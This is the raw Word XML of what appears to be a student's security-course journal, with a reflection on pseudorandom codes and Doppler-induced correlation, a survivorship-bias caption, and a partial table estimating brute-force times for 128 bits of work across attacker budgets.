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zID:</w:t>
      </w:r>
      <w:r w:rsidR="00901E67" w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> z5425064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFEE0FC" w14:textId="72163228"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r w:rsidR="005656F6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 17/06/27</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8">
        <w:r w:rsidRPr="007E5820">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="green"/>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D896A84" w14:textId="77777777" w:rsidR="00244F69" w:rsidRDefault="00244F69" w:rsidP="00244F69">
            <w:r w:rsidRPr="00244F69">
              <w:t>I found this article interesting because it connects closely to the encryption principles covered this week while also highlighting an important security risk. The article discusses pseudorandom code generation, where signals are designed to have high entropy and low correlation so they are difficult to predict, intercept, or replicate. This is similar to cryptographic key generation, where randomness is essential for maintaining security.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E09B4A" w14:textId="77777777" w:rsidR="00244F69" w:rsidRPr="00244F69" w:rsidRDefault="00244F69" w:rsidP="00244F69"/>
          <w:p w14:paraId="6BC81208" w14:textId="77777777" w:rsidR="00244F69" w:rsidRDefault="00244F69" w:rsidP="00244F69">
            <w:r w:rsidRPr="00244F69">
              <w:t>What stood out to me was that the article explains how physical effects such as Doppler shift can introduce correlation into transmitted codes. This creates a security risk because a system that appears secure in theory may become more predictable when deployed in a real environment. The article also notes that some algorithms only guarantee desirable security properties for fixed code lengths, meaning their effectiveness depends on assumptions that may not always hold in practice.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C172F09" w14:textId="77777777" w:rsidR="00244F69" w:rsidRPr="00244F69" w:rsidRDefault="00244F69" w:rsidP="00244F69"/>
          <w:p w14:paraId="7568B311" w14:textId="0A09C141" w:rsidR="00244F69" w:rsidRPr="00244F69" w:rsidRDefault="00244F69" w:rsidP="00244F69">
            <w:r w:rsidRPr="00244F69">
              <w:t xml:space="preserve">This reminded me that risk in security is not limited to weaknesses in algorithms. </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Real world </w:t>
            </w:r>
            <w:r w:rsidRPr="00244F69">
              <w:t>factors such as environmental conditions, implementation details, and incorrect assumptions can reduce the security of a system even when the underlying design is mathematically sound. It also affects the resources required by an attacker, as detecting and exploiting small correlations may require increasingly advanced receivers, signal processing techniques, and computational power. As a result, security often depends not only on whether a system can be broken, but also on the practical difficulty and cost of doing so.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51CC8241" w14:textId="78DB4C54" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="067A8EE4" w14:textId="5AE563B9" w:rsidR="001D4E4C" w:rsidRDefault="001D4E4C" w:rsidP="181B8E52">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5063100A" wp14:editId="60605C02">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2929890</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>0</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2744470" cy="2129155"/>
                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="20243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470" cy="21291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3FFAB3B7" wp14:editId="2D8BDB49">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>1905</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>3810</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2912110" cy="1921510"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="1663794505" name="Picture 2" descr="Understanding Quadrature Amplitude Modulation (QAM) and Its Applications -  Rah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Quadrature Amplitude Modulation (QAM) and Its Applications -  Rahsof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12110" cy="1921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8EFF45" w14:textId="5E98BB21" w:rsidR="001D4E4C" w:rsidRDefault="001D4E4C" w:rsidP="181B8E52">
            <w:r>
              <w:t>Left: Example of a QAM coding scheme waveform from [1] Right : System diagram of how coding works from [2]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="255F9EEB" w14:textId="77777777" w:rsidR="001D4E4C" w:rsidRDefault="001D4E4C" w:rsidP="181B8E52"/>
          <w:p w14:paraId="751A3B2C" w14:textId="3F62421C" w:rsidR="008A5A2F" w:rsidRDefault="00F34953" w:rsidP="181B8E52">
            <w:r>
              <w:t>Link:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29C7BDC7" w14:textId="33D5C5C6" w:rsidR="008A5A2F" w:rsidRPr="001D4E4C" w:rsidRDefault="008A5A2F" w:rsidP="181B8E52">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidRPr="001D4E4C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:i/>
                  <w:iCs/>
                </w:rPr>
                <w:t>https://insidegnss.com/codes-the-prn-family-grows-again/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001D4E4C">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>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BE4F31" w:rsidRDefault="6685B08B" w:rsidP="42D4980C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE4F31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Humans, Measuring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C648BC" w14:textId="5F9EB89F" w:rsidR="336AB2E5" w:rsidRPr="00ED5F6D" w:rsidRDefault="37D07EEC" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidRPr="00BE4F31">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="green"/>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13"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than in reality. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707B486E" w14:textId="12C991C7" w:rsidR="005E24F1" w:rsidRDefault="005E24F1">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="482BF733" wp14:editId="79767977">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-2307</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>72</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4027990" cy="3219241"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="606947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7990" cy="3219241"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DCC42FA" w14:textId="77777777" w:rsidR="005E24F1" w:rsidRDefault="005E24F1"/>
          <w:p w14:paraId="22A03408" w14:textId="59EA43B4" w:rsidR="00E9362C" w:rsidRDefault="005E24F1">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="203E0B2A" wp14:editId="5EF43399">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>167005</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>2863850</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="3858895" cy="541020"/>
                      <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                      <wp:wrapSquare wrapText="bothSides"/>
                      <wp:docPr id="1574389247" name="Text Box 1"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr txBox="1"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="3858895" cy="541020"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:prstClr val="white"/>
                              </a:solidFill>
                              <a:ln>
                                <a:noFill/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>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during the Second World War, the bullet holes on aircraft that returned marked out the areas that were not crucial to the planes’ integrity.Credit: Martin Grandjean (vector), McGeddon (picture), Cameron Moll (concept) (CC BY-SA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3E0B2A" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                      <v:stroke joinstyle="miter"/>
                      <v:path gradientshapeok="t" o:connecttype="rect"/>
                    </v:shapetype>
                    <v:shape id="Text Box 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:13.15pt;margin-top:225.5pt;width:303.85pt;height:4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" stroked="f">
                      <v:textbox inset="0,0,0,0">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during the Second World War, the bullet holes on aircraft that returned marked out the areas that were not crucial to the planes’ integrity.Credit: Martin Grandjean (vector), McGeddon (picture), Cameron Moll (concept) (CC BY-SA 4.0)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                      <w10:wrap type="square"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00E9362C">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5">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12F740F9" w14:textId="440E681F" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="455396D7" w14:textId="118CD246" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52"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FA69E64" w14:textId="77777777" w:rsidR="00903D82" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2876E0D0" w14:textId="77777777" w:rsidR="00903D82" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28AB3354" w14:textId="77777777" w:rsidR="00903D82" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17BA0A60" w14:textId="77777777" w:rsidR="00903D82" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A559E9B" w14:textId="77777777" w:rsidR="00903D82" w:rsidRPr="00ED5F6D" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19228AC3" w14:textId="505BA9E6" w:rsidR="6E78A25E" w:rsidRPr="00ED5F6D" w:rsidRDefault="73EA0038" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId16">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commentRangeStart w:id="0"/>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="9239" w:type="dxa"/>
              <w:tblCellSpacing w:w="1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1122"/>
              <w:gridCol w:w="1933"/>
              <w:gridCol w:w="2074"/>
              <w:gridCol w:w="2561"/>
            </w:tblGrid>
            <w:tr w:rsidR="00903D82" w:rsidRPr="00903D82" w14:paraId="381E14DA"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C0EC81E"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Attacker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E2002C2"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Budget</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D16C0D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Hardware</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CF0D564"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Bits of work per 24 hours</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E373CA3"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Time to do 128 bits of work</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00903D82" w:rsidRPr="00903D82" w14:paraId="14AE6D49" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="887"/>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512CEA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Office Worker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D8EC63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$200 (plus company provided laptop)</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9580FD1" w14:textId="733A05E7" w:rsidR="00903D82" w:rsidRPr="00903D82" w:rsidRDefault="005B73AE"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AMD Ryzen 5 5600x 6 Cores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638FE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51</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095707C"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2^77 days</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2009026A"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2^68 years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00903D82" w:rsidRPr="00903D82" w14:paraId="6AE410AE"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2A335A8"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Solo teenage Hacker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4E20FB"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$10k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A5E6E8C" w14:textId="54170989" w:rsidR="00CA4D29" w:rsidRDefault="00903D82" w:rsidP="00CA4D29">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CA4D29">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Ryzen 9/ Intel Ultra 9 + </w:t>
                  </w:r>
                  <w:r w:rsidR="006157CB">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>RTX2000</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="32542ACF" w14:textId="6040DE53" w:rsidR="00CA4D29" w:rsidRPr="00903D82" w:rsidRDefault="00CA4D29"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w:t>
                  </w:r>
                  <w:r w:rsidR="006157CB">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>(24 CPU Threads Used)</w:t>
                  </w:r>
                  <w:r w:rsidR="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">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1FB07B6" w14:textId="4F4C0A04"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717063" w:rsidRPr="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>328320</w:t>
                  </w:r>
                  <w:r w:rsidR="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>0</w:t>
                  </w:r>
                  <w:r w:rsidR="00717063" w:rsidRPr="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>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AA4551D" w14:textId="1AB2CD20" w:rsidR="00717063" w:rsidRDefault="00717063" w:rsidP="00903D82">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>2.83</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> x 10^26 days</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="06D44502" w14:textId="2B01AF06" w:rsidR="00717063" w:rsidRDefault="00717063"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7663BA04" w14:textId="1FD4CD04" w:rsidR="00717063" w:rsidRPr="00903D82" w:rsidRDefault="008B59EF"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7.75</w:t>
                  </w:r>
                  <w:r w:rsidR="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> x 10^</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>2</w:t>
                  </w:r>
                  <w:r w:rsidR="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>3 years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="2441821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60CC56"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Small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E8BD315" w14:textId="27D0E9E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10</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>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8044D" w14:textId="5795B742"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Pr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>10 *(Ryzen 9/ Intel Ultra 9 + RTX2000)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="552DD6A5" w14:textId="59F9C634" w:rsidR="00EB538C" w:rsidRPr="00903D82" w:rsidRDefault="00EB538C"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(24 CPU Threads Used)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A906842" w14:textId="57B28A2A"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sidRPr="000B00DE">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>30283200000000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23FF8A0" w14:textId="1B32194C"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Pr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>1.128 x 10^25 days</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="36890E56" w14:textId="16C92AE4"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2E8B5C0F" w14:textId="711CCC7A"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3.08 x 10^22 years</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="70FC9087" w14:textId="3CC18540" w:rsidR="000B00DE" w:rsidRPr="00903D82" w:rsidRDefault="000B00DE" w:rsidP="00EB538C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="000B00DE">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>​</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="5869EC77" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="30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29116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28DCD8C" w14:textId="394D50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2</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>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625E6E7" w14:textId="31DF404D" w:rsidR="006576AD"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:2x</w:t>
                  </w:r>
                  <w:r w:rsidR="00EB538C" w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidRPr="006576AD">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>AMD EPYC™ 9355 Processor 32-core</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> (64 Thread)</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006576AD">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 3.55GHz 256MB Cache (280W)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="55135CFC" w14:textId="412EA969" w:rsidR="00EB538C" w:rsidRPr="00903D82"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lastRenderedPageBreak/>
                    <w:t>I</w:t>
                  </w:r>
                  <w:r w:rsidR="003A1FD7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">mplemented in a Server Rack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E311B3" w14:textId="3D621B6F"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lastRenderedPageBreak/>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidR="008B59EF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>9.813 x 10^13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27EB1EA"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B59EF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">3.4669 x 10^24 days </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2C358B05" w14:textId="77777777" w:rsidR="008B59EF"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3C2AFE48" w14:textId="20031B9E" w:rsidR="008B59EF" w:rsidRPr="00903D82"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9.848 x 10^21</w:t>
                  </w:r>
                  <w:r w:rsidR="00C536AF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="060A77B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2A1890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botnet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A132F7B" w14:textId="212BECC0"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$25M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A64D4A" w14:textId="38A72311"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AMD Ryzen 5 5600x 6 Cores (4.7GHz)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0D115C6D" w14:textId="1B8A61C0" w:rsidR="00DE490B" w:rsidRPr="00903D82" w:rsidRDefault="00DE490B"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5 Million Devices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E1373CC" w14:textId="7344F3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3.384 x 10^18</w:t>
                  </w:r>
                  <w:r w:rsidR="00E05570">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">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01DEE8B" w14:textId="77777777" w:rsidR="00E05570"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5570">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">1.005 x 10^20 days </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5D21D7D9" w14:textId="77777777" w:rsidR="00E05570"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7B4E4DC5" w14:textId="0187B42D" w:rsidR="00E05570" w:rsidRPr="00903D82"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2.753 x 10 ^17 years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="38FA2DDF"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A9FE978"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Professional bitcoin miner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3CC84B3" w14:textId="0E580B3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$500M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6DA4B8A" w14:textId="429A91A9" w:rsidR="00831FB7" w:rsidRDefault="00831FB7" w:rsidP="00831FB7">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w:t>
                  </w:r>
                  <w:r w:rsidR="00EB538C" w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Bitmain Antminer S21 XP 270TH/s</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>) x 5000</w:t>
                  </w:r>
                </w:p>
